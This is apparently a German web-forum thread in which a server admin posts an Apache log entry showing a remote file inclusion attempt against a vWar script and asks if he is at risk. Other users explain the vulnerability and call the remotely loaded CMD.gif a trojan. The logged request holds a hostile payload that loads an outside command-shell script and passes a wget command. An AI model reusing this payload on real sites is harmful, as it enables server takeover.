[IPX]

hi!

in der letzten zeit häufen sich folgende einträge in den log-dateien meines win2003-apache servers:

Code:

84.143.45.xxx - - [08/Apr/2006:12:39:54 +0200] "GET /vwar/includes/get_header.php?vwar_root=http://xpl.netmisphere2.com/CMD.gif?&cmd=wget%20HTTP/1.0%22%20404%201431%20%22http://80.190.xxx.213/vwar/includes/get_header.php?vwar_root=http://xpl.netmisphere2.com/CMD.gif?&cmd=wget HTTP/1.1" 404 1123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53"

irgendwas wird wohl versucht, aus dem inet geladen zu werden - muss ich mir gedanken machen??
der server ist immer uptodate, wie kann ich feststellen, ob so ein aufruf erfolgreich war??
mache mir ein bissl sorgen...

danke für eure antworten!!

[peter.pan]

Schade das ich keine Rechte habe, sonst würde ich dein Themenname "etwas" ändern....

[IPX]

hat keiner eine antwort für mich?

[afaf]

Vwar hat ein grosses Sicherheitsloch, dem schon mehrere Websites zum Opfer gefallen sind, irgendwie kann man dadurch die Mysql Datenbanken etc. komplett löschen.

Da ich weder Hacker noch Progger bin kann ich dir natürlich nicht sagen ob es nun daran liegt, das kam mir aber sofort bei Vwar in den Sinn, denn unser page ist auch komplett erledigt worden.

[SeventotheSeven]

Man alter die versuchen des was da http://www.wolfenstein.ch/ geklappt hat geh mal mit dem balken kanz nach rechts mach die luken dicht
euer MSHs94

[IPX]

also war es eine "auf gut glück attacke" und ich muss mir keine gedanken machen, da weder vwar, noch mysql laufen?? der server hat ja auch einen 404 gegeben...

[SeventotheSeven]

Ne' Zeig die an °_°
Euer MSHS94

[Toddi]

gaaanz einfach...
CMD.gif da auf dem Server ist ein Trojaner. Sieh zu, daß Du den Laden da dicht machst.

MfG
Toddi